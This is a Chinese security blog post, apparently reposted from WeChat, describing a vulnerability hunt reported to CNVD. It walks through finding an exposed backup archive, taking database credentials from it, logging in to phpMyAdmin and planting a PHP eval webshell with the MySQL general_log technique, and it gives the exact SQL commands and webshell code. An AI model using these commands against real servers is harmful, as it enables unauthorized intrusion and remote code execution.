一次CNVD漏洞挖掘过程

admin 2025年6月20日23:52:13评论20 views字数 491阅读1分38秒阅读模式
1、被测网站
一次CNVD漏洞挖掘过程
2、使用cmd命令查询该网站ip地址,
一次CNVD漏洞挖掘过程
3、使用ip直接访问,改地址可直接下载文件(猜测应该是配置失误导致)
一次CNVD漏洞挖掘过程
4、发现该目录下有备份文件xxx.rar下载该文件5、找到文件中的敏感文件
一次CNVD漏洞挖掘过程
6、里面有数据库账号密码;
一次CNVD漏洞挖掘过程
7、因为是php搭建有phpmyadmin使用phpmyadmin登陆
一次CNVD漏洞挖掘过程
8、直接使用sql写入getshell9、通过写入日志文件getshell10、读写权限+web绝对路径,修改日志文件为webshell具体利用方法如下:(1) 开启日志记录:set global general_log = "ON";(2) 查看当前的日志目录:show variables like 'general%';(3) 指定日志文件(目录结构可以直接访问phpinfo)set global general_log_file = "C:/phpStudy/WWW/404.php";(4)写入执行代码:select "<?php $string=@$_POST['b'];eval('$string');?>";
一次CNVD漏洞挖掘过程
最后getshell连接
一次CNVD漏洞挖掘过程
已上传到CNVD
一次CNVD漏洞挖掘过程

原文始发于微信公众号(蓝云Sec):一次CNVD漏洞挖掘过程

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年6月20日23:52:13
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   一次CNVD漏洞挖掘过程https://cn-sec.com/archives/4183872.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息